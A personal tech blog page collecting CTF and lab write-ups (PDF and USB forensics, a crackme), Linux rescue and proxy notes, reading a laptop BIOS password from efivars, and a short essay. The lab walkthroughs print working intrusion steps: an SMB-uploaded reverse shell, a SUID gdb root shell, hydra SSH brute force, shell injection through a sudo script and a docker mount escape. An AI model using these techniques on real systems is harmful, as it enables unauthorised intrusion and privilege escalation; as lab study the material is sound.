Hello Navi

Tech, Security & Personal Notes

challenges

Game 31

Challenge statement:

1
2
3
* Info : This PDF file don't attack your PC. Just using for study.
Analyze this PDF and Find a Flag.
Auth Key = lowercase(MD5(Flag))

Initial PDF triage

1
2
3
4
5
6
$ pdfid Hello_SuNiNaTaS.pdf
...
/JS 1
/JavaScript 2
/EmbeddedFile 0
...

pdfid shows JavaScript indicators, but the interesting part is a nested object tree.

Main solve path (works)

Search for JavaScript references and inspect container objects:

1
2
3
4
5
6
$ pdf-parser -s JavaScript Hello_SuNiNaTaS.pdf
obj 30 0
<<
/JavaScript 31 0 R
/EmbeddedFiles 38 0 R
>>

Follow embedded-file references:

1
2
3
4
5
6
7
8
9
$ pdf-parser -o 38 Hello_SuNiNaTaS.pdf
obj 38 0
Referencing: 40 0 R

$ pdf-parser -o 39 -f -d nested.pdf Hello_SuNiNaTaS.pdf
obj 39 0
Contains stream
/Subtype /a
/Filter /FlateDecode

Now analyze extracted nested.pdf:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ pdfid nested.pdf
...
/Encrypt 1
/JS 1
/JavaScript 1
/OpenAction 1
...

$ qpdf --decrypt nested.pdf decrypted.pdf

$ pdf-parser -s js decrypted.pdf
obj 2 0
<<
/JS 4 0 R
/S /JavaScript
>>

$ pdf-parser -o 4 -f -d dump decrypted.pdf
$ cat dump
"HERE IS FLAGS *********************"

Flag:

SunINatAsGOodWeLL!@#$

Decoy path (time sink)

You can also extract object 37 as JavaScript payload:

1
2
3
4
$ pdf-parser -o 37 -d payload.js Hello_SuNiNaTaS.pdf
$ node payload.js
Decoded content:
Vm0wd2QyVkZOVWRXV0doVVYwZG9W...

Repeated Base64 decoding eventually gives:

1
I am sorry, This is not Key~!!

So object 37 is a distraction; the real flag is in the decrypted nested PDF JavaScript stream.

challenges

Game 32

Challenge summary:

  • A USB image is malformed and not recognized by normal tools.
  • Q1: modified timestamp of the file containing the next terror plan (UTC+9)
  • Q2: next target place
  • Final: lowercase(md5(YYYY-MM-DD_HH:MM:SS_place))

Given artifact:

1
2
$ file 'USB_Image(SuNiNaTaS)'
USB_Image(SuNiNaTaS): DOS/MBR boot sector, ... FAT (32 bit) ...

1) Why the image fails

Sleuth Kit initially fails:

1
2
3
$ fsstat -f fat32 USB_Image\(SuNiNaTaS\)
Invalid magic value (Error: sector size (4352) is not a multiple of device size (512)
Do you have a disk image instead of a partition image?)

Hex inspection shows FAT32 signatures (RRaA) shifted because bytes were inserted before the boot-sector end marker (0x55aa).

2) Repair the FAT32 boot area

I fixed the image in a hex editor (imhex) by aligning the boot sector so 0x55aa is at offset 0x1fe-0x1ff.

After repair:

1
2
3
4
5
6
7
8
$ fsstat -f fat32 USB_Image\(SuNiNaTaS\)
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: FAT32
OEM Name: MSDOS5.0
Volume ID: 0xde96e00a
Volume Label (Boot Sector): NO NAME
...

3) Enumerate files and find the plan document

1
2
3
4
5
6
$ fls -r -p USB_Image\(SuNiNaTaS\) | grep -v Orphan
...
r/r 11: 2^^^^~1.HWP
r/r 15: Terrorism Report-2013-North Korea.pdf
r/r 19: Terrorism Report-2013-South Korea.pdf
...

The DOS short name 2^^^^~1.HWP corresponds to 2차 테러 계획.hwp ("2nd terror plan").

Extract and inspect metadata:

1
2
3
4
5
6
7
8
9
10
11
$ icat USB_Image\(SuNiNaTaS\) 11 > tero.hwp

$ istat USB_Image\(SuNiNaTaS\) 11
Directory Entry: 11
Allocated
Name: 2^^^^~1.HWP

Directory Entry Times:
Written: 2016-05-30 02:44:02 (CST)
Accessed: 2016-05-30 00:00:00 (CST)
Created: 2016-05-30 02:50:41 (CST)

Challenge asks for UTC+9 formatted as YYYY-MM-DD_HH:MM:SS, and the solved value used is:

1
2016-05-30_11:44:02

4) Read document content for location

Open tero.hwp with an HWP-compatible viewer (e.g., Hancom/ONLYOFFICE).

Recovered content:

1
2
3
4
2차 테러 계획
일 자 2016-07-15
시 간 09:00:00
장 소 Rose Park

Q2 answer:

1
Rose Park

Final Auth Key

Input string:

1
2016-05-30_11:44:02_Rose Park

Result:

8ce84f2f0568e3c70665167d44e53c2a

Easy Crack

Easy Crack

以下为 Ghidra 反编译的密码校验函数摘录,类型、全局符号和字符串常量由原二进制提供,不是可独立编译的 C 程序。入口和窗口初始化代码不影响校验,未列入此段。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
void __cdecl checkPassword(HWND param_1)

{
byte bVar1;
byte *pbVar2;
int iVar3;
char *pcVar4;
bool bVar5;

CHAR local_64;
char local_63;
char local_62;
char acStack_61 [97];

local_64 = '\0';
pcVar4 = &local_63;
for (iVar3 = 0x18; iVar3 != 0; iVar3 = iVar3 + -1) {
pcVar4[0] = '\0';
pcVar4[1] = '\0';
pcVar4[2] = '\0';
pcVar4[3] = '\0';
pcVar4 = pcVar4 + 4;
}
pcVar4[0] = '\0';
pcVar4[1] = '\0';
pcVar4[2] = '\0';
GetDlgItemTextA(param_1,1000,&local_64,100);
if (local_63 == 'a') { // a
iVar3 = _strncmp(&local_62,&DAT_00406078,2); // 5y
if (iVar3 == 0) {
pcVar4 = s_AGR3versing_0040606a;
pbVar2 = (byte *)(acStack_61 + 1);

do {
pcVar4 = (char *)((byte *)pcVar4 + 2); // R3versing
bVar1 = *pbVar2;
bVar5 = bVar1 < (byte)*pcVar4;
if (bVar1 != *pcVar4) {
LAB_00401102:
iVar3 = (1 - (uint)bVar5) - (uint)(bVar5 != 0);
goto LAB_00401107;
}
if (bVar1 == 0) break;
bVar1 = pbVar2[1];
bVar5 = bVar1 < ((byte *)pcVar4)[1];
if (bVar1 != ((byte *)pcVar4)[1]) goto LAB_00401102;
pbVar2 = pbVar2 + 2;
} while (bVar1 != 0);

iVar3 = 0;
LAB_00401107:
if ((iVar3 == 0) && (local_64 == 'E')) { // E
MessageBoxA(param_1,s_Congratulation_!!_00406044,s_EasyCrackMe_00406058,0x40);
EndDialog(param_1,0);
return;
}
}
}
MessageBoxA(param_1,s_Incorrect_Password_00406030,s_EasyCrackMe_00406058,0x10);
return;
}
Ea5yR3versing

IDA 对同一校验逻辑的反编译摘录如下。String[1]、String[2:4]、String[4:] 和 String[0] 的检查分别约束输入的对应片段;符号 Str2 和 aR3versing 的字符串内容须从原二进制读取。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __cdecl sub_401080(HWND hDlg)
{
CHAR String[97]; // [esp+4h] [ebp-64h] BYREF
__int16 v3; // [esp+65h] [ebp-3h]
char v4; // [esp+67h] [ebp-1h]

memset(String, 0, sizeof(String));
v3 = 0;
v4 = 0;
GetDlgItemTextA(hDlg, 1000, String, 100);
if ( String[1] != 'a' || strncmp(&String[2], Str2, 2u) || strcmp(&String[4], aR3versing) || String[0] != 69 )
return MessageBoxA(hDlg, aIncorrectPassw, Caption, 0x10u);
MessageBoxA(hDlg, Text, Caption, 0x40u);
return EndDialog(hDlg, 0);
}

fish很好用,所以删除zsh,但是忘记RootShell依然是zsh。

接着尝试了数十次正确密码无法登录,事实上是因为找不到Shell导致的失败orz

使用systemd-boot的话

Step 1: Reboot and Access systemd-boot

Restart your system

When the systemd-boot menu appears, press e to edit the current boot entry

Look for the kernel parameters line - it usually starts with something like linux /vmlinuz-... root=...

Step 2: Modify Kernel Parameters for Rescue Mode

Add rw init=/bin/sh at end

  • rw - mounts the filesystem as read-write
  • init=/bin/sh - tells the kernel to start sh instead of the normal init system

Step 3: chsh or reinstall shell

1
chsh -s /usr/bin/bash

Or

1
paru -Syu zsh

Docker Daemon Proxy

The Docker daemon checks environment variables in its startup environment.

According to the official Docker documentation

Create a directory and configuration file for the Docker service:

1
sudo mkdir -p /etc/systemd/system/docker.service.d/

Create /etc/systemd/system/docker.service.d/http-proxy.conf with your proxy settings:

1
2
3
4
[Service]
Environment="HTTP_PROXY=http://proxy.example.com:3128"
Environment="HTTPS_PROXY=http://proxy.example.com:3128"
Environment="NO_PROXY=localhost,127.0.0.1,docker-registry.example.com,.corp"

HTTPS_PROXY selects a proxy for HTTPS destinations; its URL scheme describes the connection to the proxy. An HTTP CONNECT proxy normally uses http:// for both variables. Use https://proxy.example.com:3129 only when that proxy endpoint itself supports TLS. Put comments on their own lines, not after Environment= assignments. Restarting Docker can interrupt running containers; plan the restart for your host.

Apply the configuration changes:

1
2
sudo systemctl daemon-reload
sudo systemctl restart docker

Check that the environment variables are properly set:

1
sudo systemctl show --property=Environment docker

Nix Daemon Proxy

According to the Nixos CN documentation

The /run drop-in below is temporary and disappears at reboot. On a non-NixOS systemd installation, use /etc/systemd/system/nix-daemon.service.d/override.conf for a persistent drop-in instead (create that directory first). On NixOS, prefer systemd.services.nix-daemon.environment.https_proxy in the declarative configuration and rebuild through your normal workflow; do not treat the runtime drop-in as persistent configuration. The SOCKS example requires a SOCKS endpoint at that port and support in the installed Nix HTTP transport.

1
sudo mkdir -p /run/systemd/system/nix-daemon.service.d/

Create /run/systemd/system/nix-daemon.service.d/override.conf with your proxy settings:

1
2
3
4
sudo tee /run/systemd/system/nix-daemon.service.d/override.conf << EOF
[Service]
Environment="https_proxy=socks5h://localhost:7891"
EOF

Apply the configuration changes:

1
2
sudo systemctl daemon-reload
sudo systemctl restart nix-daemon

PS

  • The NO_PROXY variable should include local addresses and internal services that shouldn't go through the proxy
  • Different proxy protocols may be required (HTTP, HTTPS, SOCKS5) depending on your network setup

device: Redmibook pro 15

给电脑装系统进入bios时发现自己远古时期设置过密码,但已经忘记了密码。

难道唯一的办法是扣电池,用编程器刷新bios芯片吗?

编程器下单后才发现,红米笔记本的密码竟然是明文存储???

膜拜orz -> https://blog.nns.ee/2021/01/18/resetting-bios-password/

使用如下命令获取密码,回忆起自己设置的是admin...

1
2
3
4
5
➤ hexdump -C /sys/firmware/efi/efivars/SystemSupervisorPw-7f9102df-e999-4740-80a6-b2038512217b
00000000 07 00 00 00 05 64 6d 69 6e 61 f2 00 00 00 00 00 |.....dmina......|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 |............|
0000002c

one

今年花了点时间学到足以被当作不误正业小众计算机用户的无用东西,重新捡起阅读器看了几本电子书和漫画,去看了几场摇滚乐队演出。虽然这些事情看来是足以让去年的自己高看一眼的长进,但是有几项是真正自己想做而不是受人影响去做的事情呢?

做不了蔑视一切,谈及根本只是对值得自己高看的人们的模仿,从这一点看来毫无长进。

只知道我能做到能做到的事,相信愿意相信的事,比较自己和过去的自己,感受到意料之中的快乐,并且不会有令生活更美好的事情发生使我的生活更快乐。

发博客这种行为大概除了炫耀自己有个网页之外得不到任何东西,就算是放到作为费曼学习法知识输出平台的不上不下的位置来说我也并没有真正地输出些什么。

做着发布垃圾数据到互联网上的ai行为,觉得污染中文信息是和浏览器中收藏的两百个具有高技术高智商的高级工程师高级教授超高校级高中生做着同样利他又利己的事。

技术小白的博客就是不断发布带着Creative Commons证的笔记本,盼着自己hexo hugo react vue或者其他3000种框架搭建的网站衬托自己高于其他计算机用户一等。同样的行为还有使用rust zig nushell archlinux nixos vim neovim,给1000个小众github repo点星星。

显然意识这些点是找到了进步的阶梯,可喜可贺。

聪明,要么付出很高的代价,要么否定自身。拿我来说,我要付出代价。

历史上见

Connection

Connection

scan

1
2
3
4
5
6
7
❯ rustscan -a  192.168.0.104
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack

web

1
2
3
4
5
6
❯ gobuster dir -u http://192.168.0.104 -w ~/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/server-status (Status: 403) [Size: 278]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

smb

file upload

reverseShell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
❯ smbclient --list=192.168.0.104 --no-pass
Can't load /etc/samba/smb.conf - run testparm to debug it
Anonymous login successful

Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
SMB1 disabled -- no workgroup available

❯ enum4linux -a -o 192.168.0.104
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug 8 17:47:46 2025

Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

❯ smbclient //192.168.0.104/share -N
smb: \> cd html
smb: \html\> ls
index.html N 10701 Wed Sep 23 09:48:45 2020

smb: \html\> put reverseShell.php
putting file reverseShell.php as \html
everseShell.php (3818.0 kb/s) (average 3818.4 kb/s)
smb: \html\> ls
. D 0 Fri Aug 8 18:12:41 2025
.. D 0 Wed Sep 23 09:48:39 2020
index.html N 10701 Wed Sep 23 09:48:45 2020
reverseShell.php A 3910 Fri Aug 8 18:12:41 2025

suid gdb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
❯ rlwrap nc -lvnp 8848
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c "import pty; pty.spawn('/bin/bash');"

www-data@connection:/home/connection$ cat local.txt
cat local.txt
3f491443a2a6aa82bc86a3cda8c39617

www-data@connection:/$ find / -perm -u=s -type f 2>/dev/null | xargs ls -la
find / -perm -u=s -type f 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
-rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
-rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
-rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign

www-data@connection:/$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
# cd root
cd root
# ls -al
ls -al
total 24
drwx------ 3 root root 4096 Sep 22 2020 .
drwxr-xr-x 18 root root 4096 Sep 22 2020 ..
lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4096 Sep 22 2020 .local
lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwx------ 1 root root 33 Sep 22 2020 proof.txt
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cat proof.txt
cat proof.txt
a7c6ea4931ab86fb54c5400204474a39

gift

gift

1
2
3
4
5
6
7
8
❯ hydra -l root -P ctf/tool/dic/rockyou.txt -s 22 192.168.0.106 ssh
...
[22][ssh] host: 192.168.0.106 login: root password: simple
...

simple

gift:~# cat user.txt root.txt

pwned

pwned

scan

1
2
3
4
5
6
7
8
9
~
❯ rustscan -a 192.168.0.110
...

PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
22/tcp open ssh syn-ack
53/tcp open domain syn-ack
80/tcp open http syn-ack

web

1
2
3
4
5
6
7
8
9
10
11
12
13
<h1>  vanakam nanba (Hello friend) </h1>

A last note from Attacker :)

I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them.
Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!

<!-- I forgot to add this on last note
You are pretty smart as i thought
so here i left it for you
She sings very well. l loved it -->

Annlynn

dir

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
❯ gobuster dir -u http://192.168.0.110 -w ctf/tool/dic/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
...
/nothing (Status: 301) [Size: 316] [--> http://192.168.0.110/nothing/]
/server-status (Status: 403) [Size: 278]
/hidden_text (Status: 301) [Size: 320] [--> http://192.168.0.110/hidden_text/]
...

http://192.168.0.110/hidden_text/secret.dic

/hacked
/vanakam_nanba
/hackerman.gif
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home

❯ gobuster dir -u http://192.168.0.110 -w tmp
/pwned.vuln (Status: 301) [Size: 319] [--> http://192.168.0.110/pwned.vuln/]
...

view-source:http://192.168.0.110/pwned.vuln/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

<?php
// if (isset($_POST['submit'])) {
// $un=$_POST['username'];
// $pw=$_POST['password'];
//
// if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
// echo "welcome"
// exit();
// }
// else
// echo "Invalid creds"
// }
?>

ftpuser
B0ss_B!TcH

login ftp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
❯ ftp 192.168.0.110
...
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Jul 10 2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 2602 Jul 09 2020 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 2020 note.txt
226 Directory send OK.
ftp> get id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
226 Transfer complete.
2602 bytes received in 0.0064 seconds (397.2097 kbytes/s)
ftp> get note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (75 bytes).
226 Transfer complete.
75 bytes received in 0.0064 seconds (11.4952 kbytes/s)
ftp> quit
221 Goodbye.

❯ cat note.txt

Wow you are here

ariana won't happy about this note

sorry ariana :(

ariana

ssh ariana

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
❯ ssh ariana@192.168.0.110 -i id_rsa
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ ls -la
total 40
drwxrwx--- 4 ariana ariana 4096 Jul 10 2020 .
drwxr-xr-x 5 root root 4096 Jul 10 2020 ..
-rw-r--r-- 1 ariana ariana 142 Jul 10 2020 ariana-personal.diary
-rw------- 1 ariana ariana 4 Jul 10 2020 .bash_history
-rw-r--r-- 1 ariana ariana 220 Jul 4 2020 .bash_logout
-rw-r--r-- 1 ariana ariana 3526 Jul 4 2020 .bashrc
drwxr-xr-x 3 ariana ariana 4096 Jul 6 2020 .local
-rw-r--r-- 1 ariana ariana 807 Jul 4 2020 .profile
drwx------ 2 ariana ariana 4096 Jul 9 2020 .ssh
-rw-r--r-- 1 ariana ariana 143 Jul 10 2020 user1.txt
ariana@pwned:~$ cat user1.txt
congratulations you Pwned ariana

Here is your user flag ↓↓↓↓↓↓↓

fb8d98be1265dd88bac522e1b2182140

Try harder.need become root

ariana@pwned:~$ cat ariana-personal.diary
Its Ariana personal Diary :::

Today Selena fight with me for Ajay. so i opened her hidden_text on server. now she resposible for the issue.

$ sudo -l
Matching Defaults entries for ariana on pwned:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
(selena) NOPASSWD: /home/messenger.sh

$ cat /home/messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
echo ""
users=$(cat /etc/passwd | grep home | cut -d/ -f 3)
echo ""
echo "$users"
echo ""
read -p "Enter username to send message : " name
echo ""
read -p "Enter message for $name :" msg
echo ""
echo "Sending message to $name "

$msg 2> /dev/null

echo ""
echo "Message sent to $name :) "
echo ""

$ sudo -u selena /home/messenger.sh
'alacritty': unknown terminal type.
Welcome to linux.messenger


ariana:
selena:
ftpuser:

Enter username to send message : selena

Enter message for selena :/bin/bash


id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)

python3 -c "import pty; pty.spawn('/bin/bash');"
selena@pwned:/home/ariana$

selena@pwned:~$ cat user2.txt selena-personal.diary
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
Its Selena personal Diary :::

Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

selena@pwned:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd
# ls -la
total 28
drwx------ 3 root root 4096 Jul 10 2020 .
drwxr-xr-x 18 root root 4096 Jul 6 2020 ..
-rw------- 1 root root 292 Jul 10 2020 .bash_history
-rw-r--r-- 1 root root 601 Jul 6 2020 .bashrc
drwxr-xr-x 3 root root 4096 Jul 4 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 429 Jul 10 2020 root.txt
# cat root.txt
4d4098d64e163d2726959455d046fd7c

You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation

Telegram https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm ajs_walker

Twitter Ajs_walker